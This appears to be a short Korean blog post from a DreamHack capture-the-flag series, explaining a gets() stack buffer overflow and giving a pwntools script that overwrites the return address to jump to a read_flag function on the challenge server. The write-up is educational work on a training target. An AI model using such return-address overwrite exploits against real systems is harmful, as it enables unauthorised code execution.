gets는 BOF 취약점이 있는 함수!
지렁이 같지만 열심히 플래그를 탈취하기 위한 방법을 그려봤다.
read_flag의 주소만 알아낸다면 쉽게 풀 수 있다.
from pwn import *
p = remote("host3.dreamhack.games", 15977)
payload = b"A"*128
payload += p32(0xFFFFFFFF)
payload += p32(0x080485b9)
p.sendline(payload)
p.interactive()
휴
'시스템 해킹 > DreamHack으로 해커를 꿈꾸며' 카테고리의 다른 글
NX & ASLR 이란? (1) | 2023.02.27 |
---|---|
컴퓨터 시스템 라이브러리란(Library - Static Link vs. Dynamic Link) (0) | 2023.02.26 |
[DreamHack] basic_exploitation_000 (Stack Buffer Overflow) (0) | 2023.02.21 |
[DreamHack] Return Address Overwrite (0) | 2023.02.20 |
[DreamHack] 함수 호출 규약 (Caller, Callee, cdecl, SYSV) (1) | 2023.02.18 |